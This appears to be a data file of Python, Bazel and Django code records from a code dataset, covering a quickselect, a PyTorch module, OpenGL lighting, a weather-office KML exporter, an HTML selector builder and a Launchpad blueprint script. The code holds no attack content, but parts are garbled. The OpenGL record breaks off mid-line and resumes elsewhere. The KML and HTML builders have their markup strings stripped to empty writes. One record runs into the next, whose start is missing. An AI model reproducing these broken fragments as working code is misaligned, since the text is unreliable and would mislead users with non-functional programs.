+{"seq_id":"472275480","text":"\"\"\"\nSelection problem: find the k-th smallest of n values\n - Quick Select\n \n Given a list L,\n 1. Pick a pivot p (random or L[0] or L[n-1], whatever).\n 2.\n A = [values smaller than p]\n B = [values larger than p]\n M = [values equal to p]\n n-1 comparisons\n 3.\n if len(A) >= k: # it is not in M or B\n     find the k-th smallest value in A recursively.\n \n elif len(A) + len(M) < k: # it is not in A or M\n     find the k-th smallest value in B recursively,\n     i.e. the (k - (len(A) + len(M)))-th one.\n \n else: # it is in M\n     return p\n \n def quick_select(L, k):\n     p = L[0]\n     A, M, B = [], [], []\n\n     for x in L:\n         if p > x:\n             A.append(x)\n         elif p < x:\n             B.append(x)\n         else:\n             M.append(x)\n     \n     if len(A) >= k:\n         return quick_select(A, k)\n     elif len(A) + len(M) < k:\n         return quick_select(B, k - len(A) - len(M))\n     else:\n         return p\n \n Worst Case = O(n^2)\n - when every call leaves len(M) == 1 and A or B empty\n \n Best Case = O(n)\n - when each split is roughly in half\n \n Average Case = O(n)\n - \n\"\"\"\n\ndef QuickSelect(L, k):\n    p = L[0]\n    A, M, B = [], [], []\n\n    for x in L:\n        if p > x:\n            A.append(x)\n        elif p < x:\n            B.append(x)\n        else:\n            M.append(x)\n    \n    if len(A) >= k:\n        return QuickSelect(A, k)\n    elif len(A) + len(M) < k:\n        return QuickSelect(B, k-len(A)-len(M))\n    else:\n        return p\n\nn, k = map(int, input().split())\nL = list(map(int, input().split()))\nresult = QuickSelect(L, k)\nprint(result)","sub_path":"알고리즘/02_Quick_select.py","file_name":"02_Quick_select.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
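# A quick sanity check (hypothetical, not a dataset record) for the QuickSelect
# record above, using the same 1-based k convention: for every k, the result
# should agree with the k-th element of the sorted list.
L = [9, 1, 0, 2, 3, 4, 6, 8, 7, 10, 5]
for k in range(1, len(L) + 1):
    assert QuickSelect(L, k) == sorted(L)[k - 1]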
+{"seq_id":"387714602","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef fill_fc_weights(layers):\n    for m in layers.modules():\n        if isinstance(m, nn.Conv2d):\n            # nn.init.kaiming_normal_(m.weight.data, nonlinearity='relu')\n            nn.init.xavier_normal_(m.weight.data)\n            if m.bias is not None:\n                nn.init.constant_(m.bias, 0)\n\n\nclass VotingModule(nn.Module):\n    def __init__(self, inplanes, head_conv, outplanes):\n        super(VotingModule, self).__init__()\n        self.input_conv = nn.Sequential(nn.Conv2d(inplanes, head_conv, kernel_size=3, padding=1, bias=True),\n                                        nn.ReLU(inplace=True),\n                                        nn.Conv2d(head_conv, head_conv, kernel_size=3, padding=1, bias=True))\n\n        self.votes_conv = nn.Sequential(nn.Conv2d(head_conv, head_conv, kernel_size=3, padding=1, bias=True),\n                                        nn.ReLU(inplace=True),\n                                        nn.Conv2d(head_conv, outplanes, kernel_size=1, padding=0, bias=True))\n\n        fill_fc_weights(self.input_conv)\n        fill_fc_weights(self.votes_conv)\n\n    def forward(self, x, votes):\n        x = self.input_conv(F.relu(votes)) * x\n        x = self.votes_conv(x)\n\n        return x\n","sub_path":"nets/voting_conv.py","file_name":"voting_conv.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"128933861","text":"#!/usr/bin/env python\n\n# 3D File Manager in Python OpenGL, light helper routines\n# \n\n#import math, sys, rand
light_specular)\n glLightfv (GL_LIGHT0, GL_POSITION, light_position)\n #glLightModelfv (GL_LIGHT_MODEL_AMBIENT, light_model_ambient)\n #glLightModelf (GL_LIGHT_MODEL_LOCAL_VIEWER, light_local_view)\n\n glEnable (GL_LIGHTING)\n glEnable (GL_LIGHT0)\n glEnable (GL_DEPTH_TEST)\n\n glClearColor(.0, .0, .0, 1.0)\n #glClearColor(.5, .5, .5, 1.0)\n #glClearColor(1.0, 1.0, 1.0, 1.0)\n glClearDepth(1.0)\n\n\n","sub_path":"pyfile/pyfm-010/pyfmlight.py","file_name":"pyfmlight.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413792293","text":"import logging\nfrom dcindexLib.ix_api_elastic import ix_elastic_all_metatdata_MTL\n\n\n# ################# MAIN ################### #\n\n# get parameters here later hard code for now\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)\n\ne_index = 'rwanda'\ne_type = 'cube'\n\nmy_bucket = 'landsat-pds'\ntop_directory_prefix = 'c1/L8/172/062'\nix_elastic_all_metatdata_MTL(e_index, e_type, my_bucket, top_directory_prefix)\n\n","sub_path":"app/a1_test_landsat_pds_rwanda.py","file_name":"a1_test_landsat_pds_rwanda.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"269941077","text":"# ----------------------------------------------------------------------------\n# This software is in the public domain, furnished \"as is\", without technical\n# support, and with no warranty, express or implied, as to its usefulness for\n# any purpose.\n#\n# TCImpactGraphics_KML\n#\n# Author: P. Santos/Joe Maloney - 4/19/2011\n#\n# Last edited: 27 July 2012 - Shannon/R. Anderson - made A2 compatible\n# Last Modified 30 July 2012 - J Maloney/P. Santos - made it work with A2\n# Modified 09 Sept 2014 - J. Maloney - for 2015 season, removed MarineThreat,\n# renamed CoastalThreat -> StormSurgeThreat, InlandThreat -> FloodingRainThreat,\n# removed verylow from kml styles in header\n# Modified 11 Sept 2014 - J. Maloney/S. White - site ID is now automatically\n# retrieved from the environment.\n# Modified 16 Sept 2014 - J. Maloney/T. Lefebvre - impact statements are now\n# read from TCVDictionary (in Utilities) and formatted on-the-fly! \n# Modified 21 Oct 2014 - J. Maloney - products now go in /awips2/GFESuite/hti/\n# data.\n#\n# ----------------------------------------------------------------------------\n\nMenuItems = [\"Populate\"]\n\nimport SmartScript\nfrom numpy import *\nimport time\nimport os\nimport TimeRange\nimport AbsTime\nfrom com.raytheon.uf.common.dataplugin.gfe.reference import ReferenceData_CoordinateType as CoordinateType\nimport TCVDictionary\n\nclass Procedure (SmartScript.SmartScript):\n def __init__(self, dbss):\n SmartScript.SmartScript.__init__(self, dbss)\n\n def makeTimeRange(self):\n cTime = int(self._gmtime().unixTime()/ 3600) * 3600\n startTime = AbsTime.AbsTime(cTime - 12 * 3600)\n endTime = AbsTime.AbsTime(cTime + 12 * 3600) # 12 hours\n tr = TimeRange.TimeRange(startTime, endTime)\n\n return tr\n\n def makeThreatKML(self,threatWEName,threatKeys,threatGrid_kml):\n \n# COMMENTS CONFIG READ: the directory below is the directory where the kml txt files will be dumped.\n# From there it is synchronized to the web servers along with the graphics. If you set up\n# your gHLS scripts and data directories in a different place than recommended in the install\n# instructions, you would need to change that directory here. 
Do not change .kml.txt to .kml.\n# Only .txt file can be uploaded as include files. In the servers a php script will convert the\n# file name so that a browser can properly interpret it as a kml file to be open with Google\n# Earth or equivalent application.\n\n# Also, make sure the ownership of the kml.txt files created below is fxa:fxalpha with permissions set\n# to 666.\n\n# You can test the kml files created by copying them outside AWIPS and renaming them .kml. Then open them with\n# Google Earth.\n\n        kml_filename = '/awips2/GFESuite/hti/data/' + threatWEName + '.kml.txt'\n        kml = open(kml_filename, 'w')\n        kml.write('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n')\n        kml.write('<kml xmlns=\"http://www.opengis.net/kml/2.2\">\\n')\n        kml.write('<Document><name>'+threatWEName+'.kml</name>\\n<Folder>\\n')\n        # NOTE: four kml.write() calls defining the threat-level <Style id=...> entries\n        # stood here; their color values did not survive tag stripping and are omitted.\n        kml.write('<name>'+threatWEName+'</name><open>0</open>\\n')\n        kml.write('<ScreenOverlay><name>Product Legend</name><description>Product Legend</description><visibility>1</visibility><Icon><href>')\n\n        # each threatWEName has its own separate legend\n        # need site id, in lowercase\n        SiteID = self.getSiteID().lower()\n\n        if threatWEName == \"StormSurgeThreat\":\n            kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/stormsurgethreatlegend.png')\n        elif threatWEName == \"WindThreat\":\n            kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/windthreatlegend.png')\n        elif threatWEName == \"FloodingRainThreat\":\n            kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/floodingrainthreatlegend.png')\n        elif threatWEName == \"TornadoThreat\":\n            kml.write('http://www.nws.noaa.gov/images/ghls/' + SiteID + '/tornadothreatlegend.png')\n\n        # Complete the kml legend\n        kml.write('</href></Icon></ScreenOverlay>\\n')\n        \n        #threatKeys = self.getDiscreteKeys(threatWEName)\n        #print \"THREATKEYS ARE: \", threatKeys\n        \n        # initialize a flag. It will only be NO for the first polygon in the file.\n        flag = 'NO'\n        \n        for key in threatKeys:\n            #print \"Key:\", key\n            \n            # get index for this key\n            hazIndex = self.getIndex(key, threatKeys)\n            #print \"hazIndex:\", hazIndex\n\n            mask = equal(threatGrid_kml, hazIndex)\n            \n            #print \"Number of Grid Points: \", sum(sum(mask))\n            \n            if sum(sum(mask)) == 0:\n                continue\n            \n            # make an editArea from the mask\n            editArea = self.decodeEditArea(mask)\n            \n            # extract the polygons from the edit area\n            polygons = editArea.getPolygons(CoordinateType.LATLON)\n\n            # pull out the impact statements from the TCVDictionary\n            # We need to match the threatWEName to the entries found\n            # in the TCVDictionary\n            if threatWEName == \"TornadoThreat\":\n                threat='Tornado'\n            elif threatWEName == \"StormSurgeThreat\":\n                threat='Storm Surge'\n            elif threatWEName == \"WindThreat\":\n                threat='Wind'\n            else:\n                threat='Flooding Rain'\n            \n            # Extract the appropriate list from the dictionary, join them\n            # into a string, and make them separate bullets\n            impactStatement = \"\" \n            impactList = TCVDictionary.PotentialImpactStatements[threat][key]\n            impactStatement = \"<br>* \".join(impactList)\n            impactStatement = \"* \" + impactStatement\n#            print \"impactList:\", impactList\n#            print \"impactStatement:\", impactStatement\n            \n            if key == \"None\":\n                kmlHeader='<Placemark><name>Threat Level - None to Little</name><description>Potential for None to Little Impact:<br>' + impactStatement + '<br></description>\\n<styleUrl>#none</styleUrl>\\n'\n            \n            elif key == \"Elevated\":\n                kmlHeader='<Placemark><name>Threat Level - Elevated</name><description>Potential for Limited Impact:<br>' + impactStatement + '<br></description>\\n<styleUrl>#low</styleUrl>\\n'\n\n            elif key == \"Mod\":\n                kmlHeader='<Placemark><name>Threat Level - Moderate</name><description>Potential for Significant Impact:<br>' + impactStatement + '<br></description>\\n<styleUrl>#moderate</styleUrl>\\n'\n\n            elif key == \"High\":\n                kmlHeader='<Placemark><name>Threat Level - High</name><description>Potential for Extensive Impact:<br>' + impactStatement + '<br></description>\\n<styleUrl>#high</styleUrl>\\n'\n\n            else:\n                kmlHeader='<Placemark><name>Threat Level - Extreme</name><description>Potential for Devastating to Catastrophic Impact:<br>' + impactStatement + '<br></description>\\n<styleUrl>#extreme</styleUrl>\\n'\n\n            for i in xrange(polygons.getNumGeometries()):\n                poly = polygons.getGeometryN(i)\n                shell = poly.getExteriorRing();\n                if shell:\n                    # If shell is true, it's a new polygon\n                    if flag == 'YES':\n                        # If flag is YES, this is not the first polygon we're writing out\n                        # so close the previous polygon before continuing.\n                        kml.write('</Polygon></Placemark>\\n')\n                    \n                    kml.write(kmlHeader)\n                    kml.write('<Polygon><outerBoundaryIs><LinearRing><coordinates>')\n                    #print \"Outer shell coordinates:\"\n                    for c in shell.getCoordinates():\n                        #print \"x:\",c.x,\"y:\",c.y \n                        line = str(c.x) + ',' + str(c.y) + ',0 \\n'\n                        kml.write(line)\n                    \n                    kml.write('</coordinates></LinearRing></outerBoundaryIs>')\n                    # Now that we've written at least one polygon, set flag to YES\n                    flag = 'YES'\n                    \n                    # CHECK FOR INNER LOOPS (HOLES)\n                    for j in xrange(poly.getNumInteriorRing()):\n                        hole = poly.getInteriorRingN(j)\n                        #print \"Hole\",j,\"coordinates:\"\n                        kml.write('<innerBoundaryIs><LinearRing><coordinates>')\n                        for c in hole.getCoordinates():\n                            #print \"x:\",c.x,\"y:\",c.y\n                            line = str(c.x) + ',' + str(c.y) + ',0 \\n'\n                            kml.write(line)\n\n                        kml.write('</coordinates></LinearRing></innerBoundaryIs>') \n\n        kmlEnd='</Polygon></Placemark>\\n</Folder>\\n</Document></kml>\\n'\n        kml.write(kmlEnd)\n        kml.close()\n\n        return
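#        For reference, a single Placemark emitted by makeThreatKML above has this
#        shape (based on the reconstruction; the values shown are illustrative and
#        the coordinates come from the edit-area polygons):
#
#            <Placemark><name>Threat Level - Elevated</name>
#              <description>Potential for Limited Impact:<br>* ...</description>
#              <styleUrl>#low</styleUrl>
#              <Polygon><outerBoundaryIs><LinearRing><coordinates>
#                -80.5,25.7,0
#                ...
#              </coordinates></LinearRing></outerBoundaryIs></Polygon>
#            </Placemark>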
\n    def execute(self, varDict):\n        \n        tr = self.makeTimeRange()\n        threatlist = ['StormSurgeThreat','WindThreat','FloodingRainThreat','TornadoThreat'] \n        #threatlist = ['TornadoThreat'] # Took out MarineThreat 8/6/12 S.O. # READDED MARINE THREAT JCM 5/21/14\n\n        for grid in threatlist:\n            threatWEName = grid\n            #print \"Doing grid for time range: \", tr\n            threatGrid, threatKeys = self.getGrids(\"Fcst\", threatWEName, \"SFC\", tr)\n\n# COMMENTS CONFIG READ: For each threat element below, you need to change the edit area to the mask you are using \n# in the config file to generate that impact graphic. For example, for CoastalThreat that would be\n# XXXCoastalThreat where XXX is the 3 letter ID for your office. For WindThreat it would be XXXWindThreat.\n# And so on.\n\n            if threatWEName == \"StormSurgeThreat\":\n                editArea = self.getEditArea(\"StormSurgeWW_EditArea\")\n            elif threatWEName == \"WindThreat\":\n                editArea = self.getEditArea(\"MFL\")\n            elif threatWEName == \"FloodingRainThreat\":\n                editArea = self.getEditArea(\"MFL\")\n            elif threatWEName == \"TornadoThreat\":\n                editArea = self.getEditArea(\"MFL\")\n            else:\n                editArea = self.getEditArea(\"Marinezones\") \n\n            threatEditArea = self.encodeEditArea(editArea)\n            threatGrid_kml = where(threatEditArea, threatGrid, threatGrid-9.0)\n\n            self.makeThreatKML(threatWEName,threatKeys,threatGrid_kml)\n\n        # COMMENTS CONFIG READ: This path should be double-checked\n        os.system(\"/awips2/GFESuite/hti/bin/kml_legend.sh\")\n        \n        return\n\n","sub_path":"cave/com.raytheon.viz.gfe/localization/gfe/userPython/procedures/TCImpactGraphics_KML.py","file_name":"TCImpactGraphics_KML.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"256399780","text":"\"\"\"finding exact divisors\"\"\"\ndef tambolenler(sayi):\n    tam_bolen =[]\n    for i in range(2,sayi):#loop over the numbers between two and the number we were given\n        if sayi % i == 0:#if the number divides evenly by the loop value, append it to the tam_bolen =[] list\n            tam_bolen.append(i)\n    return tam_bolen\n\nwhile True:#loop so that we keep reading input\n    try:\n        sayi = int(input(\"bir sayi girin: \"))\n        if sayi:#if a number was entered\n            print(\"tam bolenlerimiz\",tambolenler(sayi))\n    except:#if something other than an int() is entered, skip the operation and warn the user\n        print(\"hatali giris\")","sub_path":"8Hafta-Odevler.py/2-TamBolen.py","file_name":"2-TamBolen.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"329095453","text":"from django.forms import ModelForm\nfrom .models import Training_Appt\nfrom pets.models import Dogs\n\nclass TrainingForm(ModelForm):\n    class Meta:\n        model = Training_Appt\n        fields = '__all__'\n\n\n    def __init__(self, *args, **kwargs):\n        user = kwargs.pop('pet_user')\n        super(TrainingForm, self).__init__(*args, **kwargs)\n        self.fields['pet'].queryset = Dogs.objects.filter(owner=user)\n","sub_path":"dogs_site/training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"417768658","text":"'''\nCreated on Dec 3, 2014\n\n@author: anedospe\n'''\n\nimport util\nfrom libxml2mod import doc\nfrom modules.buildHead import buildHead\nfrom modules.buildSQL import buildSQL \nimport pymongo\nimport time\nimport datetime\n\nclass video_select():\n\n    def
+{"seq_id":"417768658","text":"'''\nCreated on Dec 3, 2014\n\n@author: anedospe\n'''\n\nimport util\nfrom libxml2mod import doc\nfrom modules.buildHead import buildHead\nfrom modules.buildSQL import buildSQL \nimport pymongo\nimport time\nimport datetime\n\nclass video_select():\n\n    def video_select(self,list_params,db):\n        \n        collection = db.getCollection('video_select') #get collection\n        obj_head=buildHead() #create instance of the class buildHead\n        obj_select=buildSQL() #create instance of the class buildSQL\n        \n        html = obj_head.getBasicHead()\n        \n        cursor = collection.find({},{ \"_id\" : 0}).sort( [ (\"row_id\",pymongo.ASCENDING), (\"column_id\",pymongo.ASCENDING) ] )\n        \n        #bod=datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        #eod=datetime.datetime.now().strftime(\"%Y-%m-%d\")\n        \n        # Default date window: note that, despite its name, one_day is a 7-day span ending today.\n        eod = datetime.date.today()\n        one_day = datetime.timedelta(days=7)\n        bod = eod - one_day\n        \n        \n        html+=''\n        html+='&nbsp;&nbsp;' \\\n              '&nbsp;&nbsp;'\n        \n        html+=''\n        row=1\n        for doc in cursor:\n            \n            dom_connect=''\n            if doc['dom_connect'] != None:\n                dom_connect = 'link_url=\"' +str(doc['dom_url']) + '\" link_id=\"' + str(doc['dom_connect']) +'\"'\n            \n            \n            # Same row: append this control to the row currently being built.\n            if int(doc['row_id']) == row:\n                html+='&nbsp;&nbsp;<' + str(doc['dom_type']) + ' id=' + str(doc['dom_id']) + ' title=' + str(doc['dom_title']) + ' ' + str(doc['dom_subtype']) + \\\n                      ' name=' + str(doc['dom_name']) + ' class=' + str(doc['dom_class']) + ' label=' + str(doc['dom_label']) +dom_connect+'>'\n                \n                html+=obj_select.get_lookup(str(doc['ajax_url']), db)\n                \n                html+=''\n                if row == 1:\n                    html+='&nbsp;&nbsp;'\n                    #title=\"Secondary Filters\"\n                    #html+=''\n            \n            # Row id changed: close out the previous row and start a new one.\n            else:\n                html+=\"\"\n                if row == 1:\n                    html+=''\n                html+=''\n                html+='&nbsp;&nbsp;<' + str(doc['dom_type']) + ' id=' + str(doc['dom_id']) + ' title=' + str(doc['dom_title']) + ' ' + str(doc['dom_subtype']) + \\\n                      ' name=' + str(doc['dom_name']) + ' class=' + str(doc['dom_class']) + ' label=' + str(doc['dom_label']) +dom_connect+'>'\n                \n                html+=obj_select.get_lookup(str(doc['ajax_url']), db)\n\n                \n                html+='' \n            \n            row = int(doc['row_id'])\n        \n        \n        \n        html+='' \n        \n        html+='' \n        \n        
html+=''\n        \n        html+='' \n        return html\n    \n\n    ","sub_path":"modules/video_select.py","file_name":"video_select.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"507503444","text":"# If the nonce argument is provided, a nonce attribute will be inserted to all <script> and <link> tags.\n#\n# This macro is designed to work side by side with the existing Webpack build without requiring any\n# major changes to the pages in question.\ndef sk_page(name, deps, sass_deps, assets_serving_path=\"/\", nonce=None):\n    # Output directories.\n    DEV_OUT_DIR = \"development\"\n    PROD_OUT_DIR = \"production\"\n\n    #######################\n    # JavaScript bundles. #\n    #######################\n\n    ts_library(\n        name = \"%s_ts_lib\" % name,\n        srcs = [\"%s.ts\" % name],\n        deps = deps,\n    )\n\n    # Generates file <name>_js_bundle.js. Intermediate result; do not use.\n    rollup_bundle(\n        name = \"%s_js_bundle\" % name,\n        deps = [\n            \":%s_ts_lib\" % name,\n            \"@infra-sk_npm//@rollup/plugin-node-resolve\",\n            \"@infra-sk_npm//@rollup/plugin-commonjs\",\n            \"@infra-sk_npm//rollup-plugin-sourcemaps\",\n        ],\n        entry_point = \"%s.ts\" % name,\n        format = \"umd\",\n        config_file = \"//infra-sk:rollup.config.js\",\n    )\n\n    # Generates file <name>_js_bundle_minified.js. Intermediate result; do not use.\n    terser_minified(\n        name = \"%s_js_bundle_minified\" % name,\n        src = \"%s_js_bundle.js\" % name,\n        sourcemap = False,\n    )\n\n    # Generates file development/<name>.js.\n    copy_file(\n        name = \"%s_js_dev\" % name,\n        src = \"%s_js_bundle.js\" % name,\n        dst = \"%s/%s.js\" % (DEV_OUT_DIR, name),\n    )\n\n    # Generates file production/<name>.js.\n    copy_file(\n        name = \"%s_js_prod\" % name,\n        # For some reason the output of the terser_minified rule above is not directly visible as a\n        # source file, so we use the rule name instead (i.e. we drop the \".js\" extension).\n        src = \"%s_js_bundle_minified\" % name,\n        dst = \"%s/%s.js\" % (PROD_OUT_DIR, name),\n    )\n\n    ################\n    # CSS Bundles. #\n    ################\n\n    # Notes:\n    # - The source maps generated by the sass_binary rule are currently broken.\n    # - Sass compilation errors are not visible unless \"bazel build\" is invoked with flag\n    #   \"--strategy=SassCompiler=sandboxed\". This is due to a known issue with sass_binary. For\n    #   more details please see https://github.com/bazelbuild/rules_sass/issues/96.\n\n    # Generates file development/<name>.css.\n    sass_binary(\n        name = \"%s_css_dev\" % name,\n        src = \"%s.scss\" % name,\n        output_name = \"%s/%s.css\" % (DEV_OUT_DIR, name),\n        deps = sass_deps,\n        include_paths = [\"//infra-sk/node_modules\"],\n        output_style = \"expanded\",\n        sourcemap = True,\n    )\n\n    # Generates file production/<name>.css.\n    sass_binary(\n        name = \"%s_css_prod\" % name,\n        src = \"%s.scss\" % name,\n        output_name = \"%s/%s.css\" % (PROD_OUT_DIR, name),\n        deps = sass_deps,\n        include_paths = [\"//infra-sk/node_modules\"],\n        output_style = \"compressed\",\n        sourcemap = False,\n    )\n\n    ###############\n    # HTML files. #\n    ###############\n\n    
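    # html-insert-assets (below) rewrites the page so the served HTML references the bundles built\n    # above; roughly (a sketch, assuming the default assets_serving_path of \"/\"):\n    #\n    #   <link rel=\"stylesheet\" href=\"/<name>.css\">\n    #   <script src=\"/<name>.js\"></script>\n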
# Generates file <name>.with_assets.html. Intermediate result; do not use.\n    #\n    # See https://www.npmjs.com/package/html-insert-assets.\n    html_insert_assets(\n        name = \"%s_html\" % name,\n        outs = [\"%s.with_assets.html\" % name],\n        args = [\n            \"--html=$(location %s.html)\" % name,\n            \"--out=$@\",\n            \"--roots=$(RULEDIR)\",\n            \"--assets\",\n            # This is OK because html-insert-assets normalizes paths with successive slashes.\n            \"%s/%s.js\" % (assets_serving_path, name),\n            \"%s/%s.css\" % (assets_serving_path, name),\n        ],\n        data = [\"%s.html\" % name],\n    )\n\n    if nonce:\n        # Generates file <name>.with_assets_and_nonce.html. Intermediate result; do not use.\n        html_insert_nonce_attribute(\n            name = \"%s_html_nonce\" % name,\n            src = \"%s.with_assets.html\" % name,\n            out = \"%s.with_assets_and_nonce.html\" % name,\n            nonce = nonce,\n        )\n\n    instrumented_html = (\"%s.with_assets_and_nonce.html\" if nonce else \"%s.with_assets.html\") % name\n\n    # Generates file development/<name>.html.\n    copy_file(\n        name = \"%s_html_dev\" % name,\n        src = instrumented_html,\n        dst = \"%s/%s.html\" % (DEV_OUT_DIR, name),\n    )\n\n    # Generates file production/<name>.html.\n    copy_file(\n        name = \"%s_html_prod\" % name,\n        src = instrumented_html,\n        dst = \"%s/%s.html\" % (PROD_OUT_DIR, name),\n    )\n\n    ###########################\n    # Convenience filegroups. #\n    ###########################\n\n    # Generates all output files (that is, the development and production bundles).\n    native.filegroup(\n        name = name,\n        srcs = [\n            \":%s_dev\" % name,\n            \":%s_prod\" % name,\n        ],\n    )\n\n    # Generates the development bundle.\n    native.filegroup(\n        name = \"%s_dev\" % name,\n        srcs = [\n            \"development/%s.html\" % name,\n            \"development/%s.js\" % name,\n            \"development/%s.css\" % name,\n        ]\n    )\n\n    # Generates the production bundle.\n    native.filegroup(\n        name = \"%s_prod\" % name,\n        srcs = [\n            \"production/%s.html\" % name,\n            \"production/%s.js\" % name,\n            \"production/%s.css\" % name,\n        ]\n    )\n","sub_path":"infra-sk/index.bzl","file_name":"index.bzl","file_ext":"bzl","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"583475598","text":"# Copyright 2015 Thierry 
Carrez \n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\nimport argparse\nimport datetime\nimport sys\n\nimport launchpadlib.launchpad\nimport pytz\n\n# Parameters\nparser = argparse.ArgumentParser(description=\"Update BPs on milestone closure\")\nparser.add_argument('project', help='The project to act on')\nparser.add_argument('milestone', help='The milestone to set')\nparser.add_argument(\"--target\", action='store_true',\n help='Set target and/or series goal for implemented BPs')\nparser.add_argument(\"--clear\", action='store_true',\n help='Clear milestone from incomplete blueprints')\nparser.add_argument(\"--test\", action='store_const', const='staging',\n default='production', help='Use LP staging server to test')\nargs = parser.parse_args()\n\n# Connect to Launchpad\nprint(\"Connecting to Launchpad...\")\nlaunchpad = launchpadlib.launchpad.Launchpad.login_with('openstack-releasing',\n args.test, version='devel')\n\nproject = launchpad.projects[args.project]\nmilestone = project.getMilestone(name=args.milestone)\nif not milestone:\n parser.error('Target milestone %s does not exist' % args.milestone)\nseries = milestone.series_target\n\n# Get the blueprints\nprint(\"Retrieving blueprints...\")\nnow = datetime.datetime.now(tz=pytz.utc)\nto_clear = []\nto_series = []\nto_target = []\ncount = 0\nbps = project.all_specifications\nnumbps = len(bps)\n# Also get the series-targeted approved blueprints\nseriesbps = series.valid_specifications\nprint(\"retrieved %d blueprints\" % numbps)\n\n# Parse the blueprints\nprint(\"Parsing blueprints...\")\nfor bp in bps:\n count = count + 1\n sys.stdout.write(\"\\r%d%%\" % int(count * 100 / numbps))\n sys.stdout.flush()\n if ((bp.implementation_status == 'Implemented') and\n ((now - bp.date_completed) < datetime.timedelta(days=92)) and\n (not bp.milestone or not bp.milestone.date_targeted or\n bp.milestone.date_targeted >= milestone.date_targeted)):\n if bp not in seriesbps:\n to_series.append(bp)\n if bp.milestone != milestone:\n to_target.append(bp)\n elif not bp.is_complete and bp.milestone == milestone:\n to_clear.append(bp)\nprint()\nif (to_target):\n print()\n print(\"Those are implemented: need milestone target added\")\n for bp in to_target:\n print(bp.web_link)\n if args.target:\n bp.milestone = milestone\n bp.lp_save()\n\nif (to_series):\n print()\n print(\"Those are implemented: need series goal added/approved\")\n for bp in to_series:\n print(bp.web_link)\n if args.target:\n bp.proposeGoal(goal=series)\n\nif (to_clear):\n print()\n print(\"Those are incomplete: need their milestone target cleared\")\n for bp in to_clear:\n print(bp.web_link)\n if args.clear:\n bp.milestone = None\n bp.lp_save()\n","sub_path":"adjust_blueprints.py","file_name":"adjust_blueprints.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
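The blueprint filter in adjust_blueprints.py above packs three conditions into one `if`; restated as a standalone predicate it reads as follows (a sketch that mirrors the script's logic, including its 92-day completion window):

```python
import datetime

import pytz


def recently_implemented(bp, milestone, now=None):
    """Mirror of the script's selection rule for implemented blueprints."""
    now = now or datetime.datetime.now(tz=pytz.utc)
    return (
        bp.implementation_status == 'Implemented'
        # Completed within roughly the last three months (92 days).
        and (now - bp.date_completed) < datetime.timedelta(days=92)
        # Not already pinned to an earlier milestone.
        and (not bp.milestone
             or not bp.milestone.date_targeted
             or bp.milestone.date_targeted >= milestone.date_targeted)
    )
```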